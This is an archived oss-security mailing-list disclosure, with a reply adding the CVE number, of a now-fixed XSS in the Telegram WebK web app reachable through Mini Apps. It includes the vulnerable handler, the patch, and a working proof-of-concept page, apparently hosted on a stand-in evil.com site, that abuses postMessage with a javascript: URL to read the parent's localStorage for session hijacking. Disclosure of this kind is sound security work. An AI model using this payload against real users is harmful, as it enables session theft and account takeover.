LinuxLists.cc - [oss-security] Telegram Web app XSS / Session Hijacking 1-click

2024-04-28 16:18:06

Subject: [oss-security] Telegram Web app XSS / Session Hijacking 1-click

Hi oss-security,
I would like to share a vulnerability I reported on Telegram Web
application which is Open Source (https://github.com/morethanwords/tweb).
The vulnerability is a XSS that can be exploited to achieve session
hijacking with 1-click using Telegram Mini Apps.

I reported the vulnerability on March 9th, 2024 and Telegram promptly fixed
it on March 11th, 2024.

# Vulnerable version: Telegram WebK 2.0.0 (486) and below
# Fixed version: Telegram WebK 2.0.0 (488)

# Attack Surface
## Telegram Mini Apps
“Telegram Mini Apps are essentially web applications that you can run
directly within the Telegram messenger interface. Mini Apps support
seamless authorization, integrated crypto and fiat payments (via Google Pay
and Apple Pay), tailored push notifications, and more.”

> https://core.telegram.org/bots/webapps
> https://ton.org/mini-apps

Is important to highlight that this feature is heavily used for crypto
payments in the TON Blockchain.

# Static Analysis
A cached version of the vulnerable file can be found here:
- https://web.telegram.org/k/appDialogsManager-aLs9GOvc.js

```
telegramWebView.addMultipleEventsListeners({
// [...]
web_app_open_link:({url:t})=>{window.open(t,"_blank")}
}
```
The vulnerability was triggered with `postMessage` communication by abusing
the event `web_app_open_link` which allowed a new URL to remain with the
javascript context of the parent window using the `javascript:` scheme as
XSS payload.

# Weaponized Setup
1. Attacker creates a Bot + Mini App
2. Sets the URL of the Mini App => https://evil.com/homepage.html
3. The exploit will be hosted in the homepage of the attacker’s site
3.1. homepage.html
```
<body onload=exploit()>
<script>
function exploit() {
window.parent.postMessage(JSON.stringify({eventType: 'web_app_open_link',
eventData: {url:
"javascript:alert(JSON.stringify(window.parent.localStorage))"}}), '*'); }
</script>
</body>
```

# Telegram Patch Commit
https://github.com/morethanwords/tweb/commit/2153ea9878668769faac8dd5931b7e0b96a9f129/src/components/popups/webApp.ts

```
export default function
safeWindowOpen(url: string) {
window.open(url, '_blank', 'noreferrer');
}
```

# Demo
I have published a writeup for this finding which includes the Exploit
Demo, it's available here:

https://medium.com/@pedbap/telegram-web-app-xss-session-hijacking-1-click-95acccdc8d90

I recently requested a CVE for this vulnerability as well, looking forward
to updating the thread as soon as it is issued.

Thanks for looking into my report.

Best regards,
Pedro Baptista

2024-04-30 10:16:03

by Pedro Batista

[permalink] [raw]

Subject: [oss-security] Re: Telegram Web app XSS / Session Hijacking 1-click

CVE-2024-33905

On Sun, Apr 28, 2024 at 5:59 PM Pedro Batista <[email protected]> wrote:

> Hi oss-security,
> I would like to share a vulnerability I reported on Telegram Web
> application which is Open Source (https://github.com/morethanwords/tweb).
> The vulnerability is a XSS that can be exploited to achieve session
> hijacking with 1-click using Telegram Mini Apps.
>
> I reported the vulnerability on March 9th, 2024 and Telegram promptly
> fixed it on March 11th, 2024.
>
> # Vulnerable version: Telegram WebK 2.0.0 (486) and below
> # Fixed version: Telegram WebK 2.0.0 (488)
>
> # Attack Surface
> ## Telegram Mini Apps
> “Telegram Mini Apps are essentially web applications that you can run
> directly within the Telegram messenger interface. Mini Apps support
> seamless authorization, integrated crypto and fiat payments (via Google Pay
> and Apple Pay), tailored push notifications, and more.”
>
> > https://core.telegram.org/bots/webapps
> > https://ton.org/mini-apps
>
> Is important to highlight that this feature is heavily used for crypto
> payments in the TON Blockchain.
>
> # Static Analysis
> A cached version of the vulnerable file can be found here:
> - https://web.telegram.org/k/appDialogsManager-aLs9GOvc.js
>
> ```
> telegramWebView.addMultipleEventsListeners({
> // [...]
> web_app_open_link:({url:t})=>{window.open(t,"_blank")}
> }
> ```
> The vulnerability was triggered with `postMessage` communication by
> abusing the event `web_app_open_link` which allowed a new URL to remain
> with the javascript context of the parent window using the `javascript:`
> scheme as XSS payload.
>
> # Weaponized Setup
> 1. Attacker creates a Bot + Mini App
> 2. Sets the URL of the Mini App => https://evil.com/homepage.html
> 3. The exploit will be hosted in the homepage of the attacker’s site
> 3.1. homepage.html
> ```
> <body onload=exploit()>
> <script>
> function exploit() {
> window.parent.postMessage(JSON.stringify({eventType: 'web_app_open_link',
> eventData: {url:
> "javascript:alert(JSON.stringify(window.parent.localStorage))"}}), '*'); }
> </script>
> </body>
> ```
>
> # Telegram Patch Commit
>
> https://github.com/morethanwords/tweb/commit/2153ea9878668769faac8dd5931b7e0b96a9f129/src/components/popups/webApp.ts
>
> ```
> export default function
> safeWindowOpen(url: string) {
> window.open(url, '_blank', 'noreferrer');
> }
> ```
>
> # Demo
> I have published a writeup for this finding which includes the Exploit
> Demo, it's available here:
>
>
> https://medium.com/@pedbap/telegram-web-app-xss-session-hijacking-1-click-95acccdc8d90
>
> I recently requested a CVE for this vulnerability as well, looking forward
> to updating the thread as soon as it is issued.
>
> Thanks for looking into my report.
>
> Best regards,
> Pedro Baptista
>